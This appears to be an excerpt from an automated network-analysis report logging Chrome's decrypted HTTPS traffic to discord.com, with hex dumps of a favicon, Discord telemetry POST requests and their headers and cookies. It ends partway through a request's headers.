                                                                          Data Ascii: YMSP=g5&F(?eD{P"]_[wBz6<Z`jy,hz5'6DUS+e\ob#X n^+(#ffxWot[(n*hSH,$;|VQOen*v<VQoMzqOZV@{K1W*"0C@
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 90 67 8a 8f 01 47 87 87 48 01 d9 7c eb b0 44 18 80 6d 8e d3 72 f2 e0 4d 7d db ae c3 11 a3 d7 40 31 e1 06 16 b6 7c 0c af 45 90 1d de f5 12 df fc ab 87 f0 b0 0a 9c 8d 29 a7 9a f4 83 a1 87 1e 7a e9 db 72 1b 0f 3d f4 d0 43 2f b7 31 e2 61 fa af e9 d5 8a 83 17 c7 81 04 19 a4 5f de 4f 73 4e b1 44 63 d6 a5 9e e2 1c 8d ae 29 11 9a db 9e bf 01 ad c3 22 42 e1 34 9d c0 25 a3 95 bf 19 15 36 50 a8 c2 6e 15 cc 84 02 14 2c 05 71 f0 a6 6e 87 03 d6 42 3f ed 4f a0 6f fb e2 e6 de 51 10 9a 03 66 10 20 15 05 2a 38 15 3a 4c ea 15 4b 1d 34 d4 97 6c b8 02 48 51 93 b2 2d 85 40 a1 ac 2c c8 b2 ac 5b df 1f 82 8a 25 46 7f e7 32 e1 0a 8e 4a 40 6c 7b 78 8d 5f 81 42 55 01 aa 00 95 57 34 bc 6e bc 2e 62 1d c6 21 88 88 2d 76 52 35 86 9d 10 e4 c6 16 ff 20 53 c3 7f fa 01 f2 32 77 00 b2 36 d6
                                                                          Data Ascii: gGH|DmrM}@1|E)zr=C/1a_OsNDc)"B4%6Pn,qnB?OoQf *8:LK4lHQ-@,[%F2J@l{x_BUW4n.b!-vR5 S2w6
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 5b 6a a3 bd aa 9c 75 d3 23 6f 40 1f 21 7e f8 de 84 13 2f 55 47 7d 8c 30 c5 2c cb 6c b2 4f b5 73 6e f9 df 5b d0 87 8c bf 21 fb 10 81 59 9a 42 7d 8d 34 d5 6c cb 6d b6 5f 8d f3 1a 34 79 07 8b 01 45 a9 68 91 4a 7c 6d c4 86 34 b0 0c 57 5d bb e7 0b 2c 68 a9 27 a5 ef 61 64 83 a7 81 d3 bf 81 23 90 a8 77 7d dd bc 1f a8 d2 e8 41 23 1d 07 9a e5 6b eb f8 63 15 e8 0b 6d 54 60 14 7a 8b 05 51 9c 53 c1 56 81 d1 50 c7 cc 62 d7 8c 57 43 fc 2e d7 d8 95 9a ba 5a 73 0f eb b6 e7 24 91 d9 74 02 3e 37 f8 67 48 ba 00 6b ba 0f bd de f8 60 e3 b4 e5 85 51 e4 aa 35 fb 05 40 a0 34 c7 90 06 1e 7d 3b 02 f5 f7 34 80 31 ba 79 71 cf 26 dd e8 77 dd 47 53 6e 72 d3 2f 9a 77 d3 4c b7 79 08 d2 0c c2 40 e9 a2 36 34 04 2b 08 82 a9 f5 32 f0 64 dd 69 4a 8b 28 a6 9f 40 a9 dd 02 5d 22 8f 88 55 5d 83
                                                                          Data Ascii: [ju#o@!~/UG}0,lOsn[!YB}4lm_4yEhJ|m4W],h'ad#w}A#kcmT`zQSVPbWC.Zs$t>7gHk`Q5@4};41yq&wGSnr/wLy@64+2diJ(@]"U]
                                                                          2023-12-10 16:45:26 UTC1369INData Raw: 8c e9 43 6a c6 90 9e 29 4a 20 33 0b d9 21 65 65 29 27 2b b9 59 2b 68 91 c2 ec 74 0c a5 53 f6 46 e4 a7 5b 18 c3 f3 35 3a 7f 13 0a 32 a9 10 13 0b 36 a5 30 d3 8b 34 ad 08 53 0b 57 5a 8c 92 c8 8a 5b 6e 75 9b ac 68 83 d9 25 58 15 c5 f2 52 ac 6c a3 f5 fd 63 6b 54 db ec 69 b7 7d ed b5 b7 3d 06 e6 61 61 ab ec 6f 1f 15 0d 66 14 a5 ac 61 2c 56 90 47 48 54 98 8f 96 0e 00 81 82 68 c8 0d 82 e9 81 83 37 9e e0 fc 58 1c 74 52 03 36 f2 66 91 35 ad 5a b3 ab d1 3d 76 66 f8 4e 07 6c 74 61 b8 0c 8e b2 c8 d6 a0 1b 54 7f a9 bd da 87 d4 88 9e b1 72 96 7e 3a 0e 67 39 86 62 e7 94 60 2a c3 c6 52 a1 d6 45 97 35 b6 c1 60 8b d7 48 f6 e8 1d 72 1d 28 db 63 76 94 d4 35 c6 d6 6c 7b e9 83 47 43 6a fe a5 5b 95 93 57 33 a5 5d b7 41 ff 79 e5 7f af bd 20 75 1e 71 35 db 58 9a 75 6d b5 a1 54 52
                                                                          Data Ascii: Cj)J 3!ee)'+Y+htSF[5:2604SWZ[nuh%XRlckTi}=aaofa,VGHTh7XtR6f5Z=vfNltaTr~:g9b`*RE5`Hr(cv5l{GCj[W3]Ay uq5XumTR


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          393192.168.2.550132162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:27 UTC1789OUTPOST /api/v9/science HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 490
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          Content-Type: application/json
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://discord.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=hXPb2QwpdFJD92bsud6JQNE6MtbufLgmZ4lfuWIu0vA-1702226726512-0-604800000
                                                                          2023-12-10 16:45:27 UTC490OUTData Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 69 6d 70 72 65 73 73 69 6f 6e 5f 75 73 65 72 5f 72 65 67 69 73 74 72 61 74 69 6f 6e 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 63 6c 69 65 6e 74 5f 74 72 61 63 6b 5f 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 32 32 32 36 37 32 34 32 32 37 2c 22 69 6d 70 72 65 73 73 69 6f 6e 5f 74 79 70 65 22 3a 22 76 69 65 77 22 2c 22 69 6d 70 72 65 73 73 69 6f 6e 5f 67 72 6f 75 70 22 3a 22 75 73 65 72 5f 72 65 67 69 73 74 72 61 74 69 6f 6e 5f 66 6c 6f 77 22 2c 22 73 74 65 70 22 3a 22 66 75 6c 6c 22 2c 22 6c 6f 63 61 74 69 6f 6e 5f 73 65 63 74 69 6f 6e 22 3a 22 69 6d 70 72 65 73 73 69 6f 6e 5f 75 73 65 72 5f 72 65 67 69 73 74 72 61 74 69 6f 6e 22 2c 22 63 6c 69 65 6e 74 5f 70 65 72 66 6f 72 6d 61 6e 63 65
                                                                          Data Ascii: {"events":[{"type":"impression_user_registration","properties":{"client_track_timestamp":1702226724227,"impression_type":"view","impression_group":"user_registration_flow","step":"full","location_section":"impression_user_registration","client_performance
                                                                          2023-12-10 16:45:27 UTC986INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 37 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 4f 72 69 67 69 6e 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a
                                                                          Data Ascii: HTTP/1.1 204 No ContentDate: Sun, 10 Dec 2023 16:45:27 GMTConnection: closevary: Origin, Access-Control-Request-Method, Access-Control-Request-Headersaccess-control-allow-origin: https://discord.comVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          394192.168.2.550133162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:27 UTC1030OUTGET /assets/images/favicon.ico HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=hXPb2QwpdFJD92bsud6JQNE6MtbufLgmZ4lfuWIu0vA-1702226726512-0-604800000
                                                                          2023-12-10 16:45:27 UTC969INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 35 36 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 35 36 65 38 31 66 30 61 32 61 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:27 GMTContent-Type: image/vnd.microsoft.iconContent-Length: 24565Connection: closeCF-Ray: 8336f556e81f0a2a-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.
                                                                          2023-12-10 16:45:27 UTC400INData Raw: 00 00 01 00 04 00 10 10 00 00 01 00 20 00 68 04 00 00 46 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 ae 04 00 00 30 30 00 00 01 00 20 00 a8 25 00 00 56 15 00 00 00 00 00 00 01 00 20 00 f7 24 00 00 fe 3a 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 64 58 32 f1 64 58 98 f1 64 57 da f1 64 57 fa f1 64 58 fa f1 64 58 da f1 64 58 98 f1 64 58 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 64 57 0a f1 64 57 9a f1 64 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f1 64 57 9a f1 64 57 0a 00 00 00 00 00 00 00 00 00 00 00 00 f1 64 57 0a f1 64 58 c2 f2 65 58 ff f2
                                                                          Data Ascii: hF 00 %V $:( dX2dXdWdWdXdXdXdX2dWdWdXeXeXeXeXeXeXdWdWdWdWdXeX
                                                                          2023-12-10 16:45:27 UTC1369INData Raw: 58 ff f2 65 58 ff f7 aa a3 ff f3 7c 71 ff f2 65 58 ff f2 65 58 ff f1 65 58 ff f1 65 58 32 f1 64 57 98 f2 65 58 ff f2 65 58 ff f8 b2 ab ff fe fd fd ff fd e8 e6 ff f9 c1 bb ff fb d6 d3 ff fb d6 d3 ff f9 c1 bb ff fd e8 e6 ff fe fd fd ff f8 b2 ab ff f2 65 58 ff f2 65 58 ff f1 65 57 98 f1 64 57 da f2 65 58 ff f2 65 58 ff fc df dc ff fe fe fe ff fe fa fa ff fb d8 d5 ff fe fe fe ff fe fe fe ff fb d8 d5 ff fe fa fa ff fe fe fe ff fc df dc ff f2 65 58 ff f2 65 58 ff f1 64 57 da f1 64 57 fa f2 65 58 ff f2 65 58 ff fb d4 d0 ff fe fe fe ff f9 c0 bb ff f2 65 58 ff fc dd da ff fc dd da ff f2 65 58 ff f9 c0 bb ff fe fe fe ff fb d4 d0 ff f2 65 58 ff f2 65 58 ff f1 64 57 fa f1 64 57 fa f2 65 58 ff f2 65 58 ff f8 b4 ae ff fe fe fe ff fd ec eb ff f8 ad a6 ff fe f8 f8 ff fe
                                                                          Data Ascii: XeX|qeXeXeXeX2dWeXeXeXeXeWdWeXeXeXeXdWdWeXeXeXeXeXeXdWdWeXeX
                                                                          2023-12-10 16:45:27 UTC1369INData Raw: 32 f1 65 58 ec f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 57 ec f1 65 58 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 64 57 26 f1 65 57 ec f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 58 ec f1 65 57 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 64 57 0a f1 64 57 d4 f2 65
                                                                          Data Ascii: 2eXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXdWeX2dW&eWeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXdXeW&dWdWe
                                                                          2023-12-10 16:45:27 UTC1369INData Raw: f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 57 ec f1 64 58 fc f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f6 9f 96 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f3 76 6b ff f2 65 58 ff f2 65 58 ff f8 b0 aa ff ff ff ff ff ff ff ff ff f8 b0 aa ff f2 65 58 ff f2 65 58 ff f3 76 6b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f6 9e 96 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 58 fc f1 64 57 fc f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f4 7f 74 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f8 b6 b0 ff f2 65 58 ff f2 6f 62 ff fc e6 e4 ff ff ff ff ff ff ff ff ff fc e6 e4 ff f2 6f 63 ff f2 65 58 ff f8 b6 b0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f4 7f 74 ff f2 65 58
                                                                          Data Ascii: eXeXeXeXdWdXeXeXeXeXeXvkeXeXeXeXvkeXeXeXeXeXdXdWeXeXeXeXeXteXoboceXteX
                                                                          2023-12-10 16:45:27 UTC1369INData Raw: 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 65 57 d4 f1 65 57 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 65 58 26 f1 65 58 ec f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 65 57 ec f1 65 57 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 64 58 32 f1 64 58 ec f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff
                                                                          Data Ascii: eXeXeXeXeXeXeXeXeXeXeXeWeWeX&eXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeWeW&dX2dXeXeXeXeXeXeXeXeXeXeXeX
                                                                          2023-12-10 16:45:27 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 f1 65 58 1c f1 64 57 94 f1 64 58 f6 f2 65 58 ff f1 65 57 ff f2 65 58 ff f2 65 58 ff f1 65 57 ff f2 65 58 ff f2 65 58 ff f1 65 57 ff f2 65 58 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f1 64 57 f6 f1 64 58 96 f1 64 58 1c 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 00 00 00 00 02 00 00 00 02 f1 64 58 08 f1 64 57 7e f1 64 58 f4 f1
                                                                          Data Ascii: eXdWdXeXeWeXeXeWeXeXeWeXeWeWeWeWeWeWeWeWeWdWdXdXdXdW~dX
                                                                          2023-12-10 16:45:27 UTC1369INData Raw: 02 f1 64 57 2c f1 64 57 f4 f2 65 57 ff f1 65 58 ff f2 65 58 ff f2 65 57 ff f1 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f1 65 57 f4 f1 64 57 2c 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 64 57 08 f1 64 57 d0 f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 57 ff f1 64 58 ff f1 64 58 ff f1 64 57 ff f1 64 58 ff f1 64 58 ff f1 64
                                                                          Data Ascii: dW,dWeWeXeXeWeXeXeXdWeXeXdWeXeXdWeXeXdWeXeXdWeXeXdWeXeXdWeXeXdWeXeXdWeXeXdWeXeWdW,dWdWdXdXdXdXdXdXdXdXdWdXdXdWdXdXd
                                                                          2023-12-10 16:45:27 UTC1369INData Raw: fb d5 d1 ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fa ca c5 ff f4 84 7a ff f7 a2 9b ff fb d1 cd ff fe f4 f3 ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe f4 f3 ff fb d1 cd ff f7 a2 9b ff f4 85 7b ff fa ca c6 ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fb d4 d0 ff f3 71 65 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 65 58 ce 00 00 00 00 f1 64 57 1e f1 64 58 ff f2 65 57 ff f1 65 57 ff f2 65 58 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f6 98 8f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd ea e9 ff fe f8 f8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                          Data Ascii: z{qedXdXdXdXdXdXdXeXdWdXeWeWeXeWeWeWeW
                                                                          2023-12-10 16:45:27 UTC1369INData Raw: cf cb ff f2 65 58 ff f2 65 58 ff f1 65 57 ff f2 65 58 ff f5 8c 82 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f5 8c 83 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff fa cf cb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe fc fb ff f2 6b 5e ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f1 65 58 ff f2 64 57 ff f2 65 58 ff f1 65 58 ff f1 65 57 ff f2 64 58 ff f1 65 57 ff f2 65 58 ff f1 65 58 ff f2 65 58 ff f2 65 58 ff fc e2 e0 ff ff ff ff ff ff ff ff ff fe fe fe ff ff ff ff ff ff ff ff ff fe f8 f7 ff f3 77 6c ff f2 65 58 ff f1 65 57 ff f2 65 58 ff fa c7 c2 ff fe fe fe ff ff ff ff ff ff ff ff ff fe fe fe ff fa c8 c3 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f3 77 6b ff fe f8 f7 ff
                                                                          Data Ascii: eXeXeWeXeWeWeWeWk^eWeWeWeWeWeWeWeWeXdWeXeXeWdXeWeXeXeXeXwleXeWeXeXdWeXwk


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          395192.168.2.550134162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:27 UTC1789OUTPOST /api/v9/science HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 492
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          Content-Type: application/json
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://discord.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=Klx2KpzlAPzS0XUsz_mspbA54eHe58ixl3lHU.V9O5g-1702226727486-0-604800000
